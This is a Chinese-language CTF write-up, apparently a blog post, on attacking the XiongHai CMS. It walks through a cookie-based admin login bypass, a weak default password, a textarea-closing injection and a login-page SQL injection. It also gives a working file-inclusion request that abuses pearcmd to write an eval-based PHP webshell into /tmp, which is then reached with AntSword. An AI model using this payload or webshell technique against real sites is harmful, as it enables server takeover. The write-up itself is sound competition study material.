25更新:受不了,必须吐槽一下这个cms题,写在后面了
又忘发了……
更是坐牢的一天
除了一个送的签到题再没做上别的
其实这是服务器崩了补的,我连原本的签到题都没做上
不过别人也没做上,那这应该不是签到题吧
剩下的时间都在捅咕这个cms
最后也还是没做上
先说点拿到的东西吧
熊海cms
/admin能进后台登录界面,密码是弱口令123456
但是不需要密码其实也能进,这个cms判断是否已经登录的方式是检查cookie:
只要user的值不是空的就能直接进到后台管理页面
然后发现了有很多上传图片的位置
但是都用不了
估计是没给权限,只好找别的方式
发现了个有意思的地方
看到了这里的script,尝试用</textarea>直接闭合
成功了,尝试写入一句话木马
会被注释掉
试试用<script>包裹
在本地尝试时发现script不生效,百度一下知道php7已经废弃了script标记php语言的方式,所以这里只能用script防止被注释,里面还是要写<?php
但是一键还是连不上
下完熊海cms的源码回来了,它是直接给我存数据库里去了
然后再在页面上echo出来的,怪不得连不上
还有就是登录界面存在注入
进倒是进去了,但是里面啥也没有
没找到flag,绝对路径不知道,shell也拿不到,坐等大佬出wp再说
wp出来了,mad,这谁能想到啊
佛了
你哪怕整个谜语人出来提示也行啊你特么写个有手就行我上哪想去
这利用确实是有手就行
直接就文件包含往里传:
/admin/?+config-create+/&r=../../../../../../../../usr/share/php/pearcmd&/<?=@eval($_POST['1']);?>+../../../../../../../../../../tmp/hello.php HTTP/1.1
最好用bp,浏览器可能会把<等等编码了
然后蚁剑直接连
连的时候不要用php后缀,因为这里文件包含的时候直接给加了php后缀,详细讲解可以看看这个大佬的文章,链接在文末
flag:
最后还是感觉这题出的有点离谱
这是大佬文章:https://blog.csdn.net/qq_28624871/article/details/115392941
熊海源码:https://zdown.chinaz.com/201503/xhcms_v1.0.rar
2564
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
